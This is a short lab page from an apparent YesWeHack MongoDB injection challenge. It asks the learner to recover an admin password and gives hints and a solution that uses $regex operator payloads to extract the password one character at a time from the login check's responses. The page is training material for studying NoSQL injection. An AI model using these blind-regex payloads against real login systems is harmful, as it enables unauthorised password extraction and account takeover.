MongoDB

First Exfiltration

by YesWeHack

drag_indicator

info

drag_indicator

inputs

drag_indicator

inspect

Retrieving data

Now that you have an oracle on the database, try to recover the admin password.

Goal: find the admin password

The flag use the following format: FLAG\{\d+\}

Hints

Hint #1

expand_more

You should try other operators instead of $ne to bypass the password check,

Hint #2

expand_more

$regex can probably help you.

Solution

Read the solution

expand_more

By using the $regex operator, you can exfiltrate the password character by character.

{"$regex": "^X"} -> User not found {"$regex": "^F"} -> admin {"$regex": "^FL"} -> admin {"$regex": "^FLA"} -> admin {"$regex": "^FLAG{1"} -> admin

You just need to iterate over all possible characters until the password is fully recovered.

drag_indicator

waf

INPUT

OUTPUT

drag_indicator

code

drag_indicator

result